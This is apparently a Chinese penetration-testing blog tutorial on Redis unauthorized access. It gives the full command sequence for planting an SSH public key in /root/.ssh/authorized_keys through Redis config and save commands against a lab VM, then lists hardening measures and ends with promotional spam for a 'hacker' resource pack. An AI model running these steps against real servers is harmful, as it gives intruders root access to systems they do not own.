前言
这是我给粉丝盆友们整理的网络安全渗透测试入门阶段Redis未授权访问漏洞教程。
喜欢的朋友们,记得给强哥点赞支持和收藏一下,关注我,学习黑客技术。
1、什么是redis未授权访问漏洞
Redis安装后,如果绑定在 0.0.0.0:6379
,并且没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证或使用弱口令的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config
命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥
写入目标服务器的 /root/.ssh
文件夹的authotrized_keys
文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。
2、漏洞产生的危害
-
攻击者可以通过弱口令爆破访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行
flushall
来清空所有数据; -
攻击者可通过
EVAL
执行lua
代码,或通过数据备份功能往磁盘写入后门文件; -
最严重的情况,如果 Redis 以 root 身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器
影响版本:Redis 2.x,3.x,4.x,5.x
我给大家准备了全套《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
3、前置准备工作
-
SSH免密登录原理
SSH提供两种登录验证方式:一种是口令验证也就是账号密码登录,另一种是密钥验证,这里只简单说一下密钥验证的原理。
所谓密钥验证,其实就是一种基于公钥密码的认证,使用公钥加密、私钥解密,其中公钥是公开的,放在服务器端,你可以把同一个公钥放在所有你想SSH远程登录的服务器中,而私钥是保密的只有你自己知道,公钥加密的消息只有私钥才能解密,大体过程如下:
-
客户端生成私钥和公钥,并把公钥拷贝给服务器端;
-
客户端发起公钥认证请求,发送自己的相关信息;
-
服务器端根据客户端发来的信息查找是否存有该客户端的公钥,若没有拒绝登录;若有则使用该公钥对一个随机的256位的字符串进行加密,并发送给客户端;
-
客户端收到服务器发来的加密后的消息后使用私钥解密,并生成一个MD5值发送给服务器端;
-
服务器端根据原始随机字符串生成MD5值进行匹配, 确认客户端身份,若一样则允许登录,不一样则拒绝登录。
-
漏洞环境搭建
环境准备
(1)两台虚拟机分别安装redis服务
Centos 7安装redis,安装完成后启动redis服务,注意关闭防火墙。Kali同样安装redis
(2)生成.ssh目录
靶机如果在/root目录下没有.ssh文件夹(.ssh目录是隐藏文件夹,需要使用ls -a
命令查看其是否存在),则生成.ssh文件夹(因为redis 可以创建文件但无法创建目录,所以,redis 待写入文件所在的目录必须事先存在)# 生成.ssh文件夹 ssh localhost
.ssh文件夹一般会有两个文件,
authorized_keys
和known_hosts
-
authorized_keys
authorized_keys用来保存远程主机连接服务器的公钥,这样当远程主机想要连接服务器时,使用其私钥进行连接就可以免密登录了。
-
konwn_hosts
第一次连接其他服务器的时候,会有提示
Are you sure you want to continue connecting (yes/no)
我们是否确认要连接到目标服务器。当我们确认后,这个远程服务器的信息就会被记录到我们本地的~/.ssh/known_hosts
中(如果一开始不存在则会自动创建),这个文件里面有我们刚刚连接的服务器的信息。known_hosts
文件每连接一个新的远程服务器都会被追加产生一条新的数据记录。包括远程机器ip、远程机器公钥,当我们以后再连接之前连接过的目标服务器时,因为 known_hosts 文件中记录了我们曾经连接过,所有就不会在提示询问我们是否要连接了。 -
两台主机:
靶机:Centos 7(ip:192.168.206.155),
攻击机:Kali(192.168.206.149)) -
redis源码包:redis-2.8.17.tar.gz
4、漏洞复现
原理就是在数据库中插入一条数据,将攻击机的公钥作为value,key值随意,然后通过修改数据库持久化文件保存路径为/root/.ssh,修改持久化数据生成的文件名为authorized.keys
,把内存的数据保存到该文件里,这样就可以在服务器端的/root/.ssh下生一个授权的key。
-
测试靶机是否存在未授权访问
-
在kali上生成ssh公私钥
ssh-keygen
输入以上命令,直接一路回车,会在家目录下看到
id_rsa、id_rsa.pub
两个公私钥文件 -
将公钥写入到文件mykey中
(echo -e "\n";cat /root/.ssh/id_rsa.pub;echo -e "\n") > /root/mykey
前后用\n换行,避免和redis里其他缓存数据混合
-
使用redis客户端连接靶机redis服务,并将文件mykey写入redis缓存
./redis-cli -h 192.168.206.155 -p 6379 -x set mykey < /root/mykey
-x选项表示直接录入想要的key和value
-
使用redis客户端连接到redis服务器,修改其持久化文件保存路径为
/root/.ssh
,修改持久化数据生成的文件名为authorized.keys
# 修改持久化文件保存路径 config set dir /root/.ssh # 修改持久化数据生成的文件名 config set dbfilename authorized_keys
我给大家准备了全套《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
-
使用
save
命令,触发手动持久化(此时在靶机的/root/.ssh
目录下,可以看到有authorized_keys
文件生成) -
测试是否可以通过ssh登录目标服务器,成功登录
ssh -i /root/.ssh/id_rsa [email protected] 或者 ssh 192.168.206.155
6、修复建议
-
限制登录IP
采用绑定IP的方式或者使用防火墙限制访问redis的ip
# 在redis.conf配置文件中找到bind配置项,可以绑定ip # bind 192.168.1.100 10.0.0.1 bind 127.0.0.1
-
设置密码认证,以提供远程登录
# 在redis.conf配置文件中找到requirepass配置项 # requirepass foobared requirepass yourpassword
-
修改默认端口
# 在redis.conf配置文件中找到port配置项,默认端口为6379 port 6379
-
设置连接保持时间
连接成功后一段时间没有操作,默认断开连接
# 在redis.conf配置文件中找到timeout配置项 timeout 0
-
开启保护模式不允许外网访问
redis的
protected-mode
是在3.2
版本以后加入的新特性,其作用是禁止公网访问redis cache
,加强redis安全的。 -
禁用高危命令
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~